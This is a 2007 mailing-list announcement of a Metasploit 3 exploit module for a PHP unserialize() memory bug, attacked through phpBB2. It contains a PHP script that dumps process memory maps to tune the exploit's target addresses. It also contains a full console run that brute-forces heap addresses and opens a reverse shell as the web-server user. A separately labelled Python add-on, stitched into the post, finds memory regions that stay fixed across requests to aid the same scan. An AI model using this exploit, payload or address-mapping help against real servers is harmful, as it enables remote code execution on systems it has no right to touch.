[framework] Metasploit 3 module for PHP < 4.5.0 unserialize() bug
H D Moore
hdm at metasploit.com
Sat Mar 10 19:40:17 CST 2007
This is the first metasploit 3 exploit for a vulnerability covered by
Stefan Esser's Month of PHP bugs. It exploits a PHP interpreter bug
through a fully-patched version of phpBB2. We are still working on
a "generic" exploit for all web applications that unserialize() POST
data.
This one was tricky because we had to work around the Apache 2 request
limits to fit a ridiculous amount of data into multiple cookie headers.
Stefan Esser should be credited with discovery, patch, the cookie
technique, and the generic proof-of-concept. GML and I managed to hack
this module together between last night and this afternoon.
This module sends about 3MB of traffic per request. It needs 900k just to
trigger the vulnerability and uses another 2MB to make the brute force
process somewhat fast. You will need a very fast network connection to
use this module :-)
You can browse the module source online at:
http://metasploit.com/svn/framework3/trunk/modules/exploits/multi/php/php_unserialize_zval_phpbb2.rb
You can read more about the vulnerability at:
http://www.php-security.org/MOPB/MOPB-04-2007.html
Anyone with Metasploit 3 installed can just use 'svn update' to grab the
latest patches along with this module.
We are looking for feedback about what address ranges to cover for various
platforms. If you have a Linux system with PHP < 4.5.0, please install the
following PHP code, access it in your browser, and send me the output.
Your feedback is appreciated!
--start of maps.php---
<pre>
<?php
// Grow the process heap by 4MB before dumping the mappings.
$buff = str_repeat("X", 1024*1024*4);
// Kernel version of the host.
readfile("/proc/version");
// Memory mappings of this Apache/PHP process.
readfile("/proc/self/maps");
?>
</pre>
--end of maps.php---
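As an added example (not part of this post or the Metasploit module), here is a small Python check over two constructed maps.php captures from consecutive requests: it reports which writable regions sit at the same address both times. Regions that stay fixed are the ones a fixed-increment scan like the one in the demo below can land in; regions that move between requests (ASLR) do not appear in the result. The sample mappings and the function names are assumptions for illustration.

```python
import re

# Constructed sample of what maps.php returns after the /proc/version line,
# one snapshot per request. Real output would come from the tested host.
SNAPSHOT_A = """\
08048000-08400000 r-xp 00000000 08:01 12345 /usr/sbin/apache2
08400000-08500000 rw-p 00000000 00:00 0 [heap]
b6000000-b6a00000 rw-p 00000000 00:00 0
b7e00000-b7f40000 r-xp 00000000 08:01 67890 /lib/libc-2.5.so
bffeb000-c0000000 rw-p 00000000 00:00 0 [stack]
"""
SNAPSHOT_B = """\
08048000-08400000 r-xp 00000000 08:01 12345 /usr/sbin/apache2
08400000-08500000 rw-p 00000000 00:00 0 [heap]
b6000000-b6a00000 rw-p 00000000 00:00 0
b7e00000-b7f40000 r-xp 00000000 08:01 67890 /lib/libc-2.5.so
bfd12000-bfd27000 rw-p 00000000 00:00 0 [stack]
"""

# start-end perms offset dev inode [pathname]
MAPS_LINE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S{4})\s+\S+\s+\S+\s+\S+\s*(.*)$")

def parse_maps(text):
    """Parse /proc/<pid>/maps lines into (start, end, perms, name) tuples."""
    regions = []
    for line in text.splitlines():
        m = MAPS_LINE.match(line.strip())
        if not m:
            continue
        start, end, perms, name = m.groups()
        regions.append((int(start, 16), int(end, 16), perms, name or "[anon]"))
    return regions

def covering_region(regions, addr):
    """Return the region containing addr, or None if addr is unmapped."""
    for r in regions:
        if r[0] <= addr < r[1]:
            return r
    return None

def region_key(r):
    # Match regions across snapshots by name, permissions and size.
    return (r[3], r[2], r[1] - r[0])

def stable_writable_regions(snap_a, snap_b):
    """Writable regions whose start address is identical in both snapshots,
    as (name, start, end). Regions that moved (ASLR) are left out."""
    starts_b = {region_key(r): r[0] for r in parse_maps(snap_b) if "w" in r[2]}
    return [(r[3], r[0], r[1]) for r in parse_maps(snap_a)
            if "w" in r[2] and starts_b.get(region_key(r)) == r[0]]
```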
Quick demonstration:
msf > use exploit/multi/php/php_unserialize_zval_phpbb2
msf exploit(php_unserialize_zval_phpbb2) > show targets
Exploit targets:
Id Name
-- ----
0 Linux x86 phpBB2
msf exploit(php_unserialize_zval_phpbb2) > set TARGET 0
TARGET => 0
msf exploit(php_unserialize_zval_phpbb2) > set PAYLOAD linux/x86/shell_reverse_tcp
PAYLOAD => linux/x86/shell_reverse_tcp
msf exploit(php_unserialize_zval_phpbb2) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(php_unserialize_zval_phpbb2) > set RPORT 80
RPORT => 80
msf exploit(php_unserialize_zval_phpbb2) > set URI /faq.php
URI => /faq.php
msf exploit(php_unserialize_zval_phpbb2) > exploit
[*] Started reverse handler
[*] Creating the request...
[*] Trying address 0xb6000400...
[*] Received a response: 200 OK
[*] Trying address 0xb6100400...
[*] Received a response: 200 OK
[*] Trying address 0xb6200400...
[*] Received a response: 200 OK
[*] Trying address 0xb6300400...
[*] Received a response: 200 OK
[*] Trying address 0xb6400400...
[*] Received a response: 200 OK
[*] Trying address 0xb6500400...
[*] Received a response: 200 OK
[*] Trying address 0xb6600400...
[*] Received a response: 200 OK
[*] Trying address 0xb6700400...
[*] Received a response: 200 OK
[*] Trying address 0xb6800400...
[*] Received a response: 200 OK
[*] Trying address 0xb6900400...
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:50376)
[*] No response from the server
bash -i;
bash: no job control in this shell
apache at shank /home/httpd/phpBB2 $ id
uid=81(apache) gid=81(apache) groups=81(apache)
apache at shank /home/httpd/phpBB2 $
-HD